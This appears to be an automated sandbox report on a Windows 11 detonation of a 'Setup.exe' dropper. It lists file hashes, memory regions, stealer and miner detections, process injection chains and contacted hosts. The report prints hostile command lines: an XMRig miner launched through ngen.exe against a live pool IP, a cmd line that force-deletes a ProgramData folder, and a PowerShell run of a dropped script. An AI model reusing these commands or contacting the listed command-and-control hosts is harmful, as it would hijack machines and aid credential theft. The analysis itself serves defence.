SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/1060-136-0x00000000726E0000-0x000000007285B000-memory.dmp

memory/1060-137-0x00007FFEBB2B0000-0x00007FFEBB4A5000-memory.dmp

C:\ProgramData\AEHIDAKECF.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/4560-148-0x00000000004F0000-0x0000000000738000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8a6da991

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/4560-154-0x00000000726E0000-0x000000007285B000-memory.dmp

memory/4560-155-0x00007FFEBB2B0000-0x00007FFEBB4A5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

memory/1412-164-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/1412-165-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/1060-166-0x00000000726E0000-0x000000007285B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\879dd47f

MD5 dca8268f0c38907416e31f166da63ebc
SHA1 f1b0de2ca514e73dfc6681c470aca2014790b4ce
SHA256 0c2365c82172643e6b260a60dce95328177b8f1ca7a7c2afd75d1d927e52e823
SHA512 d2b13c72912ffd0812cf371ef28b74147cc397101b25a309efa44f97583cbaab20a615fc77f9cfa91b05b106db5d76c1e1f686ac6532f43ca4f6d28f892fbd3e

memory/4560-169-0x00000000726E0000-0x000000007285B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8df6708c

MD5 2b2e9320fb6a2233ad5360e0e15c7369
SHA1 db52e05ec2226f9b57d0bab5b67f88a0284a1080
SHA256 842df91fe3e7240bfb1db99bfc88c580695703f079577c1f1b232eac43f5432f
SHA512 e961ab2355b72257f6febf9c101f78973d084ed2af3bab8db065278adc1dfde8292eee0df9c1c6110c42767fde9b882487259292b7267528ccfe397d7a53f15a

memory/1412-176-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/3712-179-0x00007FFEBB2B0000-0x00007FFEBB4A5000-memory.dmp

memory/1412-182-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4376-183-0x00007FFEBB2B0000-0x00007FFEBB4A5000-memory.dmp

memory/3712-184-0x00000000726E0000-0x000000007285B000-memory.dmp

C:\ProgramData\JKKFIIEBKEGI\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\JKKFIIEBKEGI\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

C:\ProgramData\JKKFIIEBKEGI\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

memory/4376-199-0x00000000726E0000-0x000000007285B000-memory.dmp

memory/4556-202-0x00007FFE99FE0000-0x00007FFE9B657000-memory.dmp

memory/4556-206-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1304-209-0x00007FFEBB2B0000-0x00007FFEBB4A5000-memory.dmp

memory/4212-211-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4212-214-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4212-215-0x0000025A42920000-0x0000025A42940000-memory.dmp

memory/4212-213-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4212-216-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4212-220-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4212-219-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4212-217-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4212-218-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/1304-221-0x0000000000150000-0x00000000001C1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 31bfa05d25b42bc6a248fdd21c45d87c
SHA1 c29af5365c9e89c1ac3fd8a7b94d595634f26aaf
SHA256 64599a56affdf4e9790c32fe2c2552fdcc4196e646df39025755db7f6d623524
SHA512 26c5dfde7e66146af837506f12bbd32a97efe19423a9b33974e7eb4b8baccf3460ac9d4968ac56b943ea92bcbfdefe66e87fbde434e44c70bbf21a7a99260c3d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 019e53c242fe603d78d0780c4c7205ee
SHA1 7dc37b1e39567daa7e30f4927f917a9399913eac
SHA256 ca8d8c57354df6c562d65f64f8b77cc60b23a086dc728df3ba216d583b71fbc2
SHA512 8ad9ebd431c08e2dcb3679f53daa475380b08a8f7e93049a8e1a2193b5470e38ab9cc7f27ad328791ce75f316b37cc39d55fe401a3fecb05b937e5b51320f636

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 f4063e5b3dbcecb970971ac9c232f54e
SHA1 c52d22bfaeaf4036ddec3cc0eb7c88e3a7fc2d18
SHA256 efbc388b62113124edf01f275546b0534fba8288f1ae5a3bac34751a2e0d5d00
SHA512 45df0c9fb42667d516fecdc1105107b47e5e907760317e648befb1717c1c0e2ad45f2c32ff7cd1005a031f68b6922d6fed6b840f6324cdc35069149544ec9d60

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1

MD5 1e49c49df1e9bb5a3646fbdd72fff72d
SHA1 ca3b2f92797030ad96341c5551812e679e9746d3
SHA256 df52ed4a147cad99aec03614368f8781e806c45be6e046ec4a73a26e7ec9cd10
SHA512 b0c96599de30f1822ddc99d1fed6341ae06f25a171c52b9a78f6304d02a30f8da41738d4af4b4c8365b0b52739b3df03be99dddf764f12f724bd24a91b59c82d

memory/892-235-0x0000000004810000-0x0000000004846000-memory.dmp

memory/892-236-0x0000000004F20000-0x0000000005548000-memory.dmp

memory/892-237-0x0000000005580000-0x00000000055A2000-memory.dmp

memory/892-238-0x0000000005720000-0x0000000005786000-memory.dmp

memory/892-239-0x0000000005790000-0x00000000057F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i0niec3k.kpb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/892-249-0x0000000005800000-0x0000000005B54000-memory.dmp

memory/892-250-0x0000000005DD0000-0x0000000005DEE000-memory.dmp

memory/892-252-0x0000000005E00000-0x0000000005E4C000-memory.dmp

memory/892-254-0x0000000006FC0000-0x0000000007056000-memory.dmp

memory/892-255-0x0000000006300000-0x000000000631A000-memory.dmp

memory/892-256-0x0000000006390000-0x00000000063B2000-memory.dmp

memory/892-257-0x0000000007610000-0x0000000007BB4000-memory.dmp

memory/892-258-0x0000000008240000-0x00000000088BA000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-17 17:40

Reported

2024-06-17 17:43

Platform

win11-20240611-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1652 set thread context of 408 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2584 set thread context of 1580 N/A C:\ProgramData\BAKKEGCAAE.exe C:\Windows\SysWOW64\ftp.exe
PID 3368 set thread context of 1728 N/A C:\ProgramData\BKKJKFBKKE.exe C:\Windows\SysWOW64\ftp.exe
PID 1728 set thread context of 4528 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4528 set thread context of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\BAKKEGCAAE.exe N/A
N/A N/A C:\ProgramData\BKKJKFBKKE.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\ProgramData\BAKKEGCAAE.exe N/A
N/A N/A C:\ProgramData\BAKKEGCAAE.exe N/A
N/A N/A C:\ProgramData\BKKJKFBKKE.exe N/A
N/A N/A C:\ProgramData\BKKJKFBKKE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\ProgramData\BAKKEGCAAE.exe N/A
N/A N/A C:\ProgramData\BKKJKFBKKE.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1652 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1652 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1652 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1652 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 408 wrote to memory of 704 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 408 wrote to memory of 704 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 408 wrote to memory of 704 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 408 wrote to memory of 704 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 408 wrote to memory of 704 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 704 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BAKKEGCAAE.exe
PID 704 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BAKKEGCAAE.exe
PID 704 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BAKKEGCAAE.exe
PID 2584 wrote to memory of 1580 N/A C:\ProgramData\BAKKEGCAAE.exe C:\Windows\SysWOW64\ftp.exe
PID 2584 wrote to memory of 1580 N/A C:\ProgramData\BAKKEGCAAE.exe C:\Windows\SysWOW64\ftp.exe
PID 2584 wrote to memory of 1580 N/A C:\ProgramData\BAKKEGCAAE.exe C:\Windows\SysWOW64\ftp.exe
PID 704 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BKKJKFBKKE.exe
PID 704 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BKKJKFBKKE.exe
PID 704 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\ProgramData\BKKJKFBKKE.exe
PID 3368 wrote to memory of 1728 N/A C:\ProgramData\BKKJKFBKKE.exe C:\Windows\SysWOW64\ftp.exe
PID 3368 wrote to memory of 1728 N/A C:\ProgramData\BKKJKFBKKE.exe C:\Windows\SysWOW64\ftp.exe
PID 3368 wrote to memory of 1728 N/A C:\ProgramData\BKKJKFBKKE.exe C:\Windows\SysWOW64\ftp.exe
PID 704 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 704 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 704 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\cmd.exe
PID 2164 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2164 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2164 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2584 wrote to memory of 1580 N/A C:\ProgramData\BAKKEGCAAE.exe C:\Windows\SysWOW64\ftp.exe
PID 3368 wrote to memory of 1728 N/A C:\ProgramData\BKKJKFBKKE.exe C:\Windows\SysWOW64\ftp.exe
PID 1580 wrote to memory of 3616 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1580 wrote to memory of 3616 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1580 wrote to memory of 3616 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1728 wrote to memory of 4528 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 1728 wrote to memory of 4528 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 1580 wrote to memory of 3616 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 1728 wrote to memory of 4528 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 1728 wrote to memory of 4528 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4528 wrote to memory of 2168 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 3616 wrote to memory of 3172 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3616 wrote to memory of 3172 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3616 wrote to memory of 3172 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\ProgramData\BAKKEGCAAE.exe

"C:\ProgramData\BAKKEGCAAE.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\ProgramData\BKKJKFBKKE.exe

"C:\ProgramData\BKKJKFBKKE.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CAKFIJDHJEGI" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 poocoin.online udp
NL 149.154.167.99:443 t.me tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 18.53.55.162.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 104.21.16.123:443 businessdownloads.ltd tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 199.232.196.193:443 i.imgur.com tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
FI 135.181.22.88:80 135.181.22.88 tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
US 45.152.112.146:80 proresupdate.com tcp
US 104.21.76.173:443 contur2fa.recipeupdates.rest tcp
US 104.21.76.173:443 contur2fa.recipeupdates.rest tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp

Files

memory/1652-0-0x0000000074C50000-0x0000000074DCD000-memory.dmp

memory/1652-1-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

memory/1652-8-0x0000000074C50000-0x0000000074DCD000-memory.dmp

memory/1652-7-0x0000000074C62000-0x0000000074C64000-memory.dmp

memory/1652-9-0x0000000074C50000-0x0000000074DCD000-memory.dmp

memory/408-11-0x0000000074C51000-0x0000000074C5F000-memory.dmp

